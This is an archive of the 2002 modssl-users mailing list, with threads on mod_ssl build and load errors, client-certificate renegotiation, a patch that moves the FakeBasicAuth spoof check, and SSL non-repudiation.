Syntax error on line 219 of /local/webhome/apache-2.0.35/conf/httpd.conf:
Cannot load /local/webhome/apache-2.0.35/modules/mod_ssl.so into server: ld.so.1: /local/webhome/apache-2.0.35/bin/httpd: fatal: relocation error: file /local/webhome/apache-2.0.35/modules/mod_ssl.so: symbol X509_INFO_free: referenced symbol not found
/local/webhome/apache/bin/apachectl startssl: httpd could not be started

There is nothing in the logs directory.

The line in httd.conf is simply the loadmodule for SSL:

LoadModule ssl_module modules/mod_ssl.so


I've spent some time searching the list archives, google, etc, but I
haven't found a good pointer for this.  I'd appreciate a kick in the
right direction.

Thanks.

-MZ, CISSP #3762, RHCE #806199299900541
-- 

	from visp.engelschall.com id TAA15315; Tue, 7 May 2002 19:38:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BDA644CE770; Tue,  7 May 2002 19:38:44 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g47HcLq50739; Tue, 7 May 2002 19:38:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from flashmail.com id SAA12585; Tue, 7 May 2002 18:55:36 +0200 (MET DST)
Received: (qmail 10363 invoked from network); 7 May 2002 16:52:39 -0000
Received: from unknown (HELO flashmail.com) (80.34.84.165)
  by 0 with SMTP; 7 May 2002 16:52:39 -0000
Message-ID: <3CD80599.77566D35@flashmail.com>
Date: Tue, 07 May 2002 18:49:29 +0200
From: Pako <_pako_@flashmail.com>
Organization: APTICE
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.7-10 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re-negotiation handshake failed: Not accepted by cient!?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pako <_pako_@flashmail.com>
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I had instaled apache with openssl, modssl and php the  last two as
modules of apache, I had created my own CA certificate, Server
certificate and User certificate, using openssl functions, and i'm
trying to use it for test my server with SSL and i'm loosing hair
rapidly.

I had some problems with the handsake secuence, at first when i load my
secure site everything work, but i been asked for two times for my user
certificate, i don't know for what but if the second time i cancel the
presentation of certificate some of the images of my site don't load. My
page use frames, and everything is keeped in the same page, my images
are simple gifts and there's no diferrence aparently between the images
that load or the ones that not.

I think this could be a problem with the SSL Cache but i had it
activated in my httpd.conf

    SSLSessionCache         dbm:/opt/apache1.3.22/logs/ssl_scache
    SSLSessionCacheTimeout  300

when i start apache i get the two files ssl_cache.dir and ssl_cache.pag,
but i still had to presentate my user certificate for every link that i
use in my site, and every time that i use it. Sometimes witouth aparent
relation with the operations that i had made my netscape closes and i
get in my error_log the next:

[Tue May  7 17:42:39 2002] [error] mod_ssl: Re-negotiation handshake
failed: Not accepted by client!?
[Tue May  7 17:42:39 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Tue May  7 17:42:39 2002] [error] OpenSSL: error:1408F071:SSL
routines:SSL3_GET_RECORD:bad mac decode [Hint: Browser still remembered
details of a re-created server certificate?]

I don't know what to do, I'm using SSL_Require sentencies and maybe the
problem be there, I don't know I use the next sintax an i think it's ok


                SSLVerifyClient require
                SSLVerifyDepth 5
                SSLOptions           +FakeBasicAuth
                SSLRequireSSL
                SSLRequire ( %{SSL_CLIENT_S_DN_O} in {"TEST"} )


Help please, and sorry for the English ...

                    Pako.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 19:40:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15425; Tue, 7 May 2002 19:39:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA15311; Tue, 7 May 2002 19:38:47 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9C1FC4CE76C; Tue,  7 May 2002 19:38:44 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g47HbbI50727; Tue, 7 May 2002 19:37:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id PAA28236; Tue, 7 May 2002 15:38:05 +0200 (MET DST)
Date: Tue, 7 May 2002 15:38:05 +0200 (MET DST)
Message-Id: <200205071338.PAA28236@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: RE: [BugDB] Client Authentication BUG with FakeBasicAuth (PR#695)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

After discussing this with the author I realized I had misread the patch.

The new code moves the check in question from before the "if (!SC->bEnabled)" to later in the sequence:

    (check used to be here)

    /*
     * We decline operation in various situations...
     */
    if (!sc->bEnabled)
        return DECLINED;
    if (ap_ctx_get(r->connection->client->ctx, "ssl") == NULL)
        return DECLINED;
    if (!(dc->nOptions & SSL_OPT_FAKEBASICAUTH))
        return DECLINED;
    if (r->connection->user)
        return DECLINED;
    if ((clientdn = (char *)ap_ctx_get(r->connection->client->ctx, "ssl::client::dn")) == NULL)
      {
      /*
      * Make sure the user is not able to fake the client certificate
      * based authentication by just entering an X.509 Subject DN
      * ("/XX=YYY/XX=YYY/..") as the username and "password" as the
      * password.
      */
      if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) {
      .
      .
      .

This fixes the problem where the check fails the second time through on a subrequest or internal redirect and catches a spoof attempt in the situation when there is no client certificate DN.

My only question is: Can a user still "spoof" a FakeBasicAuth request when one of the other four previous "DECLINED" conditions are true?

Another way to approach the problem might be to keep the check where it was, but enforce it only when (ap_is_initial_req(r)) is true. The spoof can only be attempted on the initial request - not on any subrequests or internal redirects and will catch spoof attempts for all of the "DECLINED" conditions.

Anyone with more experience with this code care to comment?

Rick Barry

Compaq Computer Corporation   Compaq Secure Web Server Project Team
110 Spit Brook Road           OpenVMS System Software Group
Nashua, NH  03062             Business Critical Server Group
(603) 884-0634

-----Original Message-----
From: Barry, Richard 
Sent: Wednesday, April 24, 2002 10:42 AM
To: 'modssl-bugdb@modssl.org'
Subject: RE: [BugDB] Client Authentication BUG with FakeBasicAuth
(PR#695)


This submission is missing a conditional expression before line 1161.

What test is performed prior to executing the DN/password check in the
new code?

Rick Barry

Compaq Computer Corporation   Compaq Secure Web Server Project Team
110 Spit Brook Road           OpenVMS System Software Group
Nashua, NH  03062             Business Critical Server Group
(603) 884-0634

-----Original Message-----
From: modssl-bugdb@modssl.org [mailto:modssl-bugdb@modssl.org]
Sent: Wednesday, April 17, 2002 6:54 AM
To: modssl-users@modssl.org
Cc: modssl-bugdb@modssl.org
Subject: [BugDB] Client Authentication BUG with FakeBasicAuth (PR#695)


Full_Name: Sergio Rabellino
Version: 2.8.8
OS: Solaris 7
Submission from: (NULL) (130.192.239.73)


The "if" in ssl_engine_kernel.c at line 1130 to check against DN/password
authorization
directly form a client, break also the internal redirect done by apache under
some conditions, as the directory indexing ...

So if you use client auth, with fake basic auth and require an index, you get a
301 followed by a 403 (Forbidden)...

Below i've attached a diff patch to correct this behaviour; i've tested it on my
hosts
and all things should be fine now.

Thanks to Nick Miles for pinpointing me to the solution.

Bye.

---snip
1130,1147d1129
<      * Make sure the user is not able to fake the client certificate
<      * based authentication by just entering an X.509 Subject DN
<      * ("/XX=YYY/XX=YYY/..") as the username and "password" as the
<      * password.
<      */
<     if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) {
<         if (strcEQ(ap_getword(r->pool, &cpAL, ' '), "Basic")) {
<             while (*cpAL == ' ' || *cpAL == '\t')
<                 cpAL++;
<             cpAL = ap_pbase64decode(r->pool, cpAL);
<             cpUN = ap_getword_nulls(r->pool, &cpAL, ':');
<             cpPW = cpAL;
<             if (cpUN[0] == '/' && strEQ(cpPW, "password"))
<                 return FORBIDDEN;
<         }
<     }
< 
<     /*
1158a1141,1161
>       {
>       /*
>       * Make sure the user is not able to fake the client certificate
>       * based authentication by just entering an X.509 Subject DN
>       * ("/XX=YYY/XX=YYY/..") as the username and "password" as the
>       * password.
>       */
>       if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) {
>               if (strcEQ(ap_getword(r->pool, &cpAL, ' '), "Basic")) {
>               while (*cpAL == ' ' || *cpAL == '\t')
>                       cpAL++;
>               cpAL = ap_pbase64decode(r->pool, cpAL);
>               cpUN = ap_getword_nulls(r->pool, &cpAL, ':');
>               cpPW = cpAL;
>               if (cpUN[0] == '/' && strEQ(cpPW, "password"))
>               {
>                       ssl_log(r->server, SSL_LOG_INFO, "WARNING: Old mod_ssl
breakthrough solicited (FakeBasicAuth by DN) !");
>                       return FORBIDDEN;
>               }
>               }
>       }
1159a1163
>       }
1160a1165
> 
--snip
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 19:57:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17250; Tue, 7 May 2002 19:56:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id TAA17154; Tue, 7 May 2002 19:55:27 +0200 (MET DST)
Received: (qmail 43788 invoked by uid 908); 7 May 2002 17:55:25 -0000
Date: Tue, 7 May 2002 13:55:25 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: OpenSSL with mod_ssl in Apache 2.0.35
Message-ID: <20020507135525.A43669@sidehack.sat.gweep.net>
References: <20020506192233.A70215@sidehack.sat.gweep.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020506192233.A70215@sidehack.sat.gweep.net>; from megazone@megazone.org on Mon, May 06, 2002 at 07:22:33PM -0400
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time MegaZone shaped the electrons to say...
> The platform is Solaris 8.

[snip]

Whoa, that got stuck in the Ether for a while - I sent this out earlier
last night than the message that came through then.

This was the issue with the non-shared OpenSSL.

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 22:25:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA27531; Tue, 7 May 2002 22:24:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from a2.scoop.co.nz id WAA27520; Tue, 7 May 2002 22:24:05 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g47KO2Oc000854
	for ; Wed, 8 May 2002 08:24:03 +1200 (NZST)
	(envelope-from andrew@scoop.co.nz)
Date: Wed, 8 May 2002 08:24:02 +1200 (NZST)
From: Andrew McNaughton 
X-X-Sender: andrew@a2
To: modssl-users@modssl.org
Subject: Re: Repudiability
In-Reply-To: <3CD7DD7D.8010207@thenewpush.com>
Message-ID: <20020508063036.G99069-100000@a2>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: 8BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew McNaughton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



On Tue, 7 May 2002, [ISO-8859-1] Balázs Nagy wrote:

> John.Airey@rnib.org.uk wrote:
>
> >>Suppose someone refutes that they have sent information to a Web site
> >>owner, how is the Web site owner to prove that the information was in
> >>fact received and that it was signed with a given key?
> >>
> >>To do this, the Web site owner would presumably need to be
> >>able to produce
> >>the still-encrypted post as sent by the user, but from a
> >>quickish reading
> >>of the mod_ssl reference, I don't see any way to log this information.
> >>
> >>Andrew McNaughton
> >
> > Provided you know the time of the transaction, the web server logs will give
> > you details of the IP address all the web transactions are coming from. You
> > can find who owns this IP address via the Ripe (www.ripe.net), Arin
> > (www.arin.net) or Apnic (www.apnic.net) websites.
> >
> > From this you can find which ISP this address belongs to, and that ISP can
> > verify who was using that IP address at the time. How much assistance you
> > receive from each ISP will vary.
> >
> > That may give you sufficient information to press a case against the person
> > who alleges they didn't access your website, but IANAL.

Logs are easily faked, as are the contents of databases.  If you are a
party  to a dispute, then this data is far from hard evidence.

Currently the state of electronic transactions seems analogous to the
following way of conducting a paper transaction.

  You exchange signatures with your customer, diligently verify their
  authenticity, and then throw them away.  Then you send a form to your
  customer.  They fill in their information on a separate piece of paper
  (out of context) and send it back.  You copy that information to your
  database, and throw away what the customer sent you.

Seriously, if you were designing the system to avoid having any evidence
that the customer acted as you say they did, then you couldn't do much
better.

> John, unfortunately IP hijacking is so trivial (see threads on bugtrack) that
> this method will not work with reasonable certainty.

This is a separate problem, and assuming the private keys are in fact
private, not really an issue.

> > I'm not sure what you mean about information being signed with a given key.
> > Do you mean a personal key like a digital signature, or do you mean the SSL
> > key?
>
> The Andrew is right.  Repudiation or rather non-repudiation
> can be achieved with public-private<->private public encryption.
> Owen is right SSL/HTTPS doesn't support that in itself. Here is how
> public-private auth/encoding should work:
>
> Message = M
> Transmitted = T
> Public Key = pub
> Private Key = priv
> Transmision of Message M: M->T--transmit-->T->M
> pub-priv enc works like T = enc(pub, M) <=> M = dec(priv, T)
>                          T = enc(priv, M) <=> M = dec(pub, T)
>
> Non repudiation: send T = enc(priv_sender, enc(pub_receiver, M))
>                   receive M = dec(pub_sender, dec(priv_receiver, T))
>
> Of course this is simplifed, but holds the principle.
>
> With HTTPS, the only way to authenticate for sure the message
> sender, is with the sender's cert (CLIENT CERT). If you log that
> auth, then you know for sure who came to the site. For that, you
> need to restrict that part of the site to auth with client certs.

The client can prove to you that he is who he says he is, but it seems you
can't prove it to anyone else.

It seems that the reason why SSL can't provide this evidence is that the
private keys are only used to establish a symetric session key.  The
actual data exchanged in the transaction is not encrypted or signed with
the private key, so nothing of evidential value is transferred.  The only
thing you've got is the users' public key, evidence that they agreed to
use an arbitrary session key and some data encrypted with that session key
which you could have as easily encrypted yourself.

It seems we have a poor basis for a new economy given that we know how to
do these things properly.  I wonder how long it will be before a test case
arises.

Apart from the SSL stuff, we also need to be able to have the client sign
both the recieved form and the data they return as a single unit in order
to prove the context of their submission.

Andrew

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 22:42:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28460; Tue, 7 May 2002 22:41:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vasco-exch.vasco.com id WAA28428; Tue, 7 May 2002 22:41:06 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by vasco-exch.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Tue, 7 May 2002 22:38:02 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 7 May 2002 20:41:05 UT
Date: Tue, 7 May 2002 16:42:49 -0400
MIME-Version: 1.0
Subject: Re: Repudiability
Message-ID: <3CD80409.12489.48336368@localhost>
References: <3CD7DD7D.8010207@thenewpush.com>
In-reply-to: <20020508063036.G99069-100000@a2>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 07 May 2002 20:38:02.0913 (UTC) FILETIME=[15820110:01C1F607]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> It seems we have a poor basis for a new economy given that we know how
> to do these things properly.  I wonder how long it will be before a
> test case arises.
> 
> Apart from the SSL stuff, we also need to be able to have the client
> sign both the recieved form and the data they return as a single unit
> in order to prove the context of their submission.

I don't know that we're that bad. Netscape communicator does have a Javascipt function called signText, which you could use of form submission (along with client 
certs). It's similarly possible to code an activex control for IE that would sign a form.
This is not to say that there couldn't be better repudiation in the ssl layer. Merely, that if you had to, you could conduct business in a reasonable fashion.

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 23:32:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA01749; Tue, 7 May 2002 23:31:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from a2.scoop.co.nz id XAA01685; Tue, 7 May 2002 23:30:26 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g47LUMOc003446
	for ; Wed, 8 May 2002 09:30:23 +1200 (NZST)
	(envelope-from andrew@scoop.co.nz)
Date: Wed, 8 May 2002 09:30:22 +1200 (NZST)
From: Andrew McNaughton 
X-X-Sender: andrew@a2
To: modssl-users@modssl.org
Subject: Re: Repudiability
In-Reply-To: <3CD80409.12489.48336368@localhost>
Message-ID: <20020508092558.J654-100000@a2>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew McNaughton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



On Tue, 7 May 2002, Aryeh Katz wrote:

> Date: Tue, 7 May 2002 16:42:49 -0400
> From: Aryeh Katz 
> Reply-To: modssl-users@modssl.org
> To: modssl-users@modssl.org
> Subject: Re: Repudiability
>
> > It seems we have a poor basis for a new economy given that we know how
> > to do these things properly.  I wonder how long it will be before a
> > test case arises.
> >
> > Apart from the SSL stuff, we also need to be able to have the client
> > sign both the recieved form and the data they return as a single unit
> > in order to prove the context of their submission.
>
> I don't know that we're that bad. Netscape communicator does have a Javascipt function called signText, which you could use of form submission (along with client
> certs). It's similarly possible to code an activex control for IE that would sign a form.
> This is not to say that there couldn't be better repudiation in the ssl layer. Merely, that if you had to, you could conduct business in a reasonable fashion.

Certainly people go ahead and conduct business.  What happens though if a
test case comes up with a ruling that insufficient evidence exists to
prove a given transaction happened as the vendor claimed?

If Javascript or Active X has access to the user's private key, then there
has been a serious breach of security.  If any organisation is signing
ActiveX controls which access the user's private key, then those
organisations signing authority should certainly not be trusted.

Andrew

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 23:53:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA02959; Tue, 7 May 2002 23:52:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.thenewpush.com id XAA02896; Tue, 7 May 2002 23:51:15 +0200 (MET DST)
Received: (qmail 16228 invoked from network); 7 May 2002 21:57:14 -0000
Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.122)
  by sophocles with RC4-MD5 encrypted SMTP; 7 May 2002 21:57:14 -0000
Message-ID: <3CD84A3F.5070602@thenewpush.com>
Date: Tue, 07 May 2002 15:42:23 -0600
From: =?ISO-8859-1?Q?Bal=E1zs_Nagy?= 
Organization: theNewPush, LLC.
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Repudiability
References: <20020508092558.J654-100000@a2>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bal=E1zs_Nagy?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Andrew McNaughton wrote:
> 
> If Javascript or Active X has access to the user's private key, then there
> has been a serious breach of security.  If any organisation is signing
> ActiveX controls which access the user's private key, then those
> organisations signing authority should certainly not be trusted.

This is the whole beauty of the public-private key auth scheme.
You don't need to have the users private key to make sure that
the user signed the message.  In fact, the private key is useless
for that purpose.  Instead, you validate the signature with the
users public key, which is OK to have access to...

-- 
Cheers,
	Balázs

-----------------------------------------------------
Balázs Nagy                           TheNewPush, LLC
Managing Partner                 tel. +1-303-523-5729
Research & Development           fax. +1-720-294-0933
=======>Internet Infrastructure and Presence Provider


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 07:22:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA01358; Wed, 8 May 2002 07:21:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp-server1.tampabay.rr.com id HAA01344; Wed, 8 May 2002 07:20:53 +0200 (MET DST)
Received: from cfl.rr.com (106.99.35.65.cfl.rr.com [65.35.99.106])
	by smtp-server1.tampabay.rr.com (8.12.2/8.12.2) with ESMTP id g485KpCk000213
	for ; Wed, 8 May 2002 01:20:51 -0400 (EDT)
Message-ID: <3CD8B539.866EC414@cfl.rr.com>
Date: Wed, 08 May 2002 01:18:49 -0400
From: Jack Jacobsen 
Organization: Phoenix AMS
X-Mailer: Mozilla 4.78C-SGI [en] (X11; U; IRIX 6.5 IP22)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Dynamic IP Addressing
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jack Jacobsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



I've recently started using the Apache HTTP server and really like it a
lot.  One great advantage is the SSL capability, which I intend to
use if I can.  That leads me to my question.  I use a commercial
web host for the web site for my home business, but need to use my home
computer as a download server to distribute rather large audio files to
my clients.  I currently access my home server through a link on the
main site, using my home computer's IP address, which has really worked
well.  I can offer these large files for downloading to my customers
on the main site and they never really know that they're being served up
from my computer at home.

The problem is that I'd like to offer SSL as a feature of my home download
server.  I've got a broadband connection with a company that doesn't
offer static IP addressing for it's users, so my home IP address changes
now and then.  I then simply have to go to the main site and update
my link to the server to reflect the new IP address and I'm back in business,
but I'm wondering if this will prohibit me from using SSL.  I'm not
sure how to overcome the name matching that the SSL certificate requires. 
I can't apply for a certificate using an IP address for an identity, because
it'll change, but I also can't use the domain name of my computer because
my client's browser's see only the IP address used for access.

What I'd like to know is if there's any way to configure Apache+mod-ssl
to return my computer's domain name, even if it's accessed by way of it's
IP address?  That would give me a consistent name that would satisfy
the SSL certificate name matching.  When my IP address changes, all
I'd need to do is update my httpd.conf file to reflect the new IP address
to respond to and the SSL certificate should never know the difference.

I know that this is a reverse DNS function of sorts and I'm pretty sure
that there's a way of doing it, but so far I've read all the documentation
that I could find on httpd.conf configuration, but still haven't had any
luck.  I'd sure appreciate any help that you could provide.

Thanks

-- 
Jack Jacobsen
jcj@cfl.rr.com
Voice (407) 636-9458
FAX   (407) 632-8189

 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 08:00:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA03263; Wed, 8 May 2002 07:59:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id HAA03247; Wed, 8 May 2002 07:58:48 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g485wba22825;
	Wed, 8 May 2002 01:58:37 -0400
Date: Wed, 8 May 2002 01:58:37 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Jack Jacobsen 
cc: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
In-Reply-To: <3CD8B539.866EC414@cfl.rr.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 8 May 2002, Jack Jacobsen wrote:

> What I'd like to know is if there's any way to configure Apache+mod-ssl
> to return my computer's domain name, even if it's accessed by way of it's
> IP address?

Why does it need to be accessed by IP address if it has a fixed domain
name?

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 08:48:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA06341; Wed, 8 May 2002 08:47:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA06243; Wed, 8 May 2002 08:46:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 848C94CE76D; Wed,  8 May 2002 08:46:44 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g485CJY67955; Wed, 8 May 2002 07:12:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web13603.mail.yahoo.com id DAA16630; Wed, 8 May 2002 03:18:42 +0200 (MET DST)
Message-ID: <20020508011830.54082.qmail@web13603.mail.yahoo.com>
Received: from [213.11.117.254] by web13603.mail.yahoo.com via HTTP; Tue, 07 May 2002 18:18:30 PDT
Date: Tue, 7 May 2002 18:18:30 -0700 (PDT)
From: John Ratelle 
Subject: mod_ssl version
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Ratelle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

How does one determine the version of mod_ssl
installed with apache?

Thanks in advance, jjr

__________________________________________________
Do You Yahoo!?
Yahoo! Health - your guide to health and wellness
http://health.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 08:48:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA06348; Wed, 8 May 2002 08:48:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA06242; Wed, 8 May 2002 08:46:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 638D74CE769; Wed,  8 May 2002 08:46:44 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g485C7D67943; Wed, 8 May 2002 07:12:07 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx0.gmx.net id XAA01562; Tue, 7 May 2002 23:28:27 +0200 (MET DST)
From: jmos@gmx.net
Received: (qmail 11821 invoked by uid 0); 7 May 2002 21:28:18 -0000
Date: Tue, 7 May 2002 23:28:18 +0200 (MEST)
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: DH parameters
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0002586498@gmx.net
X-Authenticated-IP: [213.7.205.222]
Message-ID: <18324.1020806898@www9.gmx.net>
X-Mailer: WWW-Mail 1.5 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
